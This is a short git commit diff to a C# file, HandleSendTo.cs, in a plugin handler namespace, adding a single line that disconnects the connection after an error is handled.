Update HandleSendTo.cs

This commit is contained in:
NYAN CAT 2019-10-10 09:45:05 +03:00
parent 8fae985984
commit 8c50e4b80a

View File

@ -45,6 +45,7 @@ namespace Plugin.Handler
{ {
Packet.Error(ex.Message); Packet.Error(ex.Message);
} }
Connection.Disconnected();
} }
public void SendToMemory(MsgPack unpack_msgpack) public void SendToMemory(MsgPack unpack_msgpack)